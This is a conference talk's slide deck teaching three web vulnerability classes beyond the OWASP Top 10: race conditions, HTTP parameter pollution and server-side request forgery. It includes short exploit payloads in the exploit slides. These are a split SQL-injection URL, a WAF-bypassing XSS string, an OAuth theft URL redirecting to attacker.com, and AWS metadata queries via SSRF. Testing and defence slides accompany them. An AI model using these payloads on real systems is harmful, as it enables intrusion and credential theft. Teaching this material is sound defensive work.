The OWASP Top 10 is the standard first reference we give web developers who are interested in making their applications more secure. It is also the categorization scheme we give to web vulnerabilities on our security assessment reports. And finally, and perhaps most frighteningly, it is the most common framework used by organizations for securing their web applications. But what if there was more to web application security than the OWASP Top 10? In this talk, we will discuss vulnerabilities that don't fit into the OWASP Top 10 categories, but are just as dangerous if present in a web application. Developers and pentesters will benefit from this talk, as both exploits and mitigations will be covered for each of the vulnerabilities.

1. Beyond OWASP Top 10
@insp3ctre

2. @insp3ctre
Aaron Hnatiw
Twitter: @insp3ctre
• Software developer
• College professor
• Security consultant
• System administrator
• Web developer
Senior security researcher,
Security Compass

3. @insp3ctre
What is this talk about?
@insp3ctre

4. @insp3ctre@insp3ctre

5. @insp3ctre
http://www.sans.org/reading-room/whitepapers/analyst/
2015-state-application-security-closing-gap-35942

6. @insp3ctre
OWASP TOP 10 2013
A1- Injection
A2- Broken authentication and session management
A3- Cross-site scripting (XSS)
A4- Insecure direct object references (IDOR)
A5- Security misconfiguration
@insp3ctre

7. @insp3ctre
OWASP TOP 10 2013 (CONT’D)
A6- Sensitive data exposure
A7- Missing function level access control
A8- Cross-site request forgery (CSRF)
A9- Using components with known vulnerabilities
A10- Unvalidated redirects and forwards
@insp3ctre

8. @insp3ctre
Race conditions
CWE-362

9. @insp3ctre
Making assumptions

10. @insp3ctre
ASSUMPTION

11. @insp3ctre
REALITY

12. @insp3ctre
Exploits

13. @insp3ctre
1. Unlimited money!
https://sakurity.com/blog/2015/05/21/starbucks.html

14. @insp3ctre
2. Draining Bitcoins from a
bug bounty reward
https://cobalt.io/cobalt/cobalt/reports/587

15. @insp3ctre
Testing for race conditions

16. @insp3ctre
WHITE BOX TESTING
1. Identify all shared data
2. Identify where that shared data is accessed across
systems
3. Find where that data access is not synchronized
4. Make a ton of requests

17. @insp3ctre
BLACK BOX TESTING
•Race The Web (RTW): https://github.com/insp3ctre/race-the-
web
‣Free, open-source tool
‣Built specifically to easily test for race conditions in web
applications.
‣Accompanying vulnerable web application for practicing
race condition testing: http://RaceTheWeb.io
•Burp Suite Intruder

18. @insp3ctre

19. @insp3ctre
Be careful of DoS.
Most bug bounties have restrictions such as:
https://hackerone.com/airbnb

20. @insp3ctre
Defence and mitigation

21. @insp3ctre
LOCKS
•Use locks on any shared resources.
‣Use pessimistic locking in your database.
‣Use our ORM’s optimistic locking.
‣Most programming languages have locking built-in.
‣File locks
✦This is what Microsoft Word uses (~$somefile.docx), as
well as most file synching platforms.

22. @insp3ctre
OTHER MITIGATIONS
•CSRF tokens
•Fast database
•Inserts over updates

23. @insp3ctre
Sources & further reading

24. @insp3ctre
SOURCES & FURTHER READING
• Hackfest 2016 - Racing The Web: https://youtu.be/
4T99v957I0o
•RaceTheWeb.io
•Beyond OWASP Top 10 - Race Conditions (http://bit.ly/
raceconditions)

25. @insp3ctre
HTTP parameter pollution
(HPP)
CWE-235

26. @insp3ctre
Applications interpret parameter values in different ways
https://dunnesec.com/category/attacks-defence/http-parameter-pollution/

27. @insp3ctre
Exploits

28. @insp3ctre
Leveraging HPP to get SQL injection:
http://example.com/search.aspx?q=select/*&q=*/
name&q=password/*&q=*/from/*&q=*/users
Result: q=select/*,*/name,password/*,*/from/*,*/users

29. @insp3ctre
Bypass WAFs, especially blacklist-based:
GET /index.aspx?a=<scrip&a=t>alert(&a=)</
scri&a=pt
Bypass input validation:

30. @insp3ctre
Better CSRF URLs:
http://example.com/admin?
action=post%26action%3Ddelete&user=1

31. @insp3ctre
Stealing OAuth credentials
from Twitter
https://hackerone.com/reports/114169
https://www.digits.com/login
?consumer_key=9I4iINIyd0R01qEPEwT9IC6RE
&host=https%3A%2F%2Fwww.periscope.tv
&host=https%3A%2F%2Fattacker.com

32. @insp3ctre
Testing for HPP

33. @insp3ctre
Append existing parameters
with different values
Example: http://example.com/test?
id=12345&test=true&id=54321

34. @insp3ctre
With Burp Suite Intruder

35. @insp3ctre
SOURCES
•Form fields (search, login, etc.)
•Pagination
•Admin page identifiers
‣http://example.com/admin/
page=1&action=view&page=12345
•Find more by intercepting all POST requests & parameters

36. @insp3ctre
Automate with Burp Suite

37. @insp3ctre
Defence and mitigation

38. @insp3ctre
DEFENCE AND MITIGATION
•Dynamic testing (DAST)
•Find instances of parameters in source code- explicitly
select first or last
•Check your WAF
•Output encoding
•Best case- strip duplicate parameters before processing

39. @insp3ctre
Sources & further reading

40. @insp3ctre
SOURCES & FURTHER READING
•https://dunnesec.com/category/attacks-defence/http-parameter-pollution/ (@Dunn3)
•https://www.owasp.org/index.php/Testing_for_HTTP_Parameter_pollution_(OTG-
INPVAL-004)
•AppSec EU 2009 - presentation by Luca Carettoni and Stefano di Paola (https://
www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf)
•Split and Join white paper on bypassing web application firewalls with HTTP
parameter pollution, by Lavakumar Kuppan (http://www.andlabs.org/whitepapers/
Split_and_Join.pdf)
•Automated Discovery of Parameter Pollution Vulnerabilities in Web Applications, by
Marco Balduzzi, Carmen Torrano Gimenez, Davide Balzarotti, and Engin Kirda (https://
www.isoc.org/isoc/conferences/ndss/11/pdf/6_1.pdf)

41. @insp3ctre
Server Side Request Forgery
(SSRF)
CWE-918

42. @insp3ctre
SSRF - OVERVIEW
•Bypass firewalls
•Reach internal network
•Often an application attack becomes network attack
•Useful for enumeration and reconnaissance
‣Further hides attacker’s source IP
•Often introduced to bypass SOP (it’s a feature!)
•Can be leveraged to get XSS via returned content

43. @insp3ctre
Exploits

44. @insp3ctre
Querying AWS metadata
through SSRF
http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/

45. @insp3ctre
ATTACK STEPS
1. Found the following endpoint: https://play.esea.net/
global/media_preview.php?url=
‣Only loads images
2. Bypass: https://play.esea.net/global/
media_preview.php?url=http://ziot.org/?.png
‣https://play.esea.net/global/media_preview.php?
url=http://ziot.org/xss.html?.png

46. @insp3ctre
ATTACK STEPS (CONT’D)
3. Query http://169.254.169.254/ to pull AWS instance
metadata
‣https://play.esea.net/global/media_preview.php?
url=http://169.254.169.254/latest/meta-data/?.png
‣Guide: http://docs.aws.amazon.com/AWSEC2/latest/
UserGuide/ec2-instance-metadata.html

47. @insp3ctre
Google digs google
https://www.rcesecurity.com/2017/03/ok-google-give-me-all-your-internal-dns-information/

48. @insp3ctre
Normal interface, with response:

49. @insp3ctre
Let’s modify the post request...

50. @insp3ctre
Fun fact- Google was running a
minecraft server at
"minecraft.corp.google.com"

51. @insp3ctre
Testing for SSRF

52. @insp3ctre
TESTING FOR SSRF
•Is a URL provided in a request? Change to:
‣Another remote URL (e.g. google.com)
‣Loopback address (e.g. localhost, 127.0.0.1)
‣Local IP (e.g. 192.168.0.1, 10.10.0.1, 172.16.0.1)
‣Different protocol URL (e.g. “file://“, “ssh://“, “ftp://“)
‣Different port
•Burp Suite Intruder works really well for automating this
‣Sort by response sizes

53. @insp3ctre
TESTING FOR SSRF (CONT’D)
•Got XXE? Try specifying system or external URIs (e.g. file:///
etc/passwd)
‣More info: https://www.owasp.org/index.php/
XML_External_Entity_(XXE)_Processing
•Use Burp Suite’s Collaborator servers for external resources,
if you don’t have your own

54. @insp3ctre
Defence and mitigation

55. @insp3ctre
DEFENCE AND MITIGATION
•SOP exists for a reason
‣DO NOT use JSONP or other server workarounds
‣DO use CORS
•Again- whitelist allowed domains and protocols, and
sanitize input
•Access control between server and internal network

56. @insp3ctre
DEFENCE AND MITIGATION (CONT’D)
•Why whitelist protocols?
•PHP supported protocol URLs:
•file://
•http://
•ftp://
•php://
•zlib://
•data://
•Glob://
•phar://
•ssh2://
•rar://
•ogg://
•expect://
More: http://php.net/manual/en/wrappers.php

57. @insp3ctre
Let’s review

58. @insp3ctre
OWASP TOP 10 2013
A1- Injection
A2- Broken authentication and session management
A3- Cross-site scripting (XSS)
A4- Insecure direct object references (IDOR)
A5- Security misconfiguration

59. @insp3ctre
OWASP TOP 10 2013 (CONT’D)
A6- Sensitive data exposure
A7- Missing function level access control
A8- Cross-site request forgery (CSRF)
A9- Using components with known vulnerabilities
A10- Unvalidated redirects and forwards

60. @insp3ctre
BEYOND OWASP TOP 10
1. Race conditions
2. HTTP parameter pollution (HPP)
3. Server-side request forgery (SSRF)

61. @insp3ctre
None of these are on the
OWASP Top 10 2013

62. @insp3ctre
OWASP Top 10 2017 RC2

63. @insp3ctre
From the OWASP Top 10 RC2 guide

64. @insp3ctre
OWASP TOP 10 2017 RC2
https://github.com/OWASP/Top10/issues

65. @insp3ctre
Still applies!

66. @insp3ctre
Final message

67. @insp3ctre
The OWASP Top 10 is a good
start, but there’s much more

68. @insp3ctre
From the OWASP Top 10 RC2 guide

69. @insp3ctre
RESOURCES TO KEEP LEARNING
•HackerOne "hacktivity" feed: https://hackerone.com/
hacktivity
•Twitter
•Reddit /r/netsec
•HackerOne Zero Daily newsletter: https://
www.hackerone.com/zerodaily

70. Thank you
Aaron Hnatiw
@insp3ctre
aaron@securitycompass.com